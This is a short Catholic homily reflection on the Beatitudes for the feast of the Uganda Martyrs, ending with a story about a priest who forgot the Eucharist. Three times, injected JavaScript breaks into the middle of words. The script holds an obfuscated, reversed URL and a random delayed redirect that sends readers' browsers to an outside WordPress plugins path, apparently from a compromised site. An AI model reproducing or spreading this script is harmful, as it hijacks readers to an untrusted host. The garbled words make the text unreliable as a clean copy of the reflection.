Gospel: Matthew 5, 1-12a
As today we have celebrated the feast of Uganda Martyrs, the Lord invited each one of us to follow His way. It is a way of sufferings but also a way of life and genuine joy. In the gospel passage about the beatitudes, Jesus shows us the life we should follow. We must walk with the challenges that life presents to us. “Blessed are the poor in spirit, for theirs is the kingtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom of heaven…” In this passage Jesus shows a kind of life we ought to live, filled with blessings and happiness. Unfortunately many seek happiness in the wrong way. According to an author, by building a house, we will find happiness in the future. The current materialistic world teaches to get happiness only when we are rich enough and have possessions. We direct our lives on the culture of the provisional while our passage on earth is very short. People who look for approval in order to be happy get disappointed most of the times. Very often, we forget the essential. There is an anectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dote about a given priest on the celebration day of the Holy Sacrament. He was eager to prepare every detail about the ceremony: the choir, the altar servers, the stations for the Blessed Sacrament and so on. But during the procession of the Blessed Sacrament, an altar server noticed that the priest had forgotten to put the Eucharist in the monstrance. He was very astonished. This is an example of how we forget to focus on the essential, Jesus Christ Himself.
Being a Christian is not so easy; it is about fighting always to reach the promises of God, His kingtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom. With Christ, the logic of being should prevail over that of having. Jesus invites us once again to strive for eternal happiness.
In those few lines, I hope to have shared with you what I heard from the homily from the 6:30 AM Mass of June 29, 2020 celebrated by Father Marcien Ndayizeye, Isch.
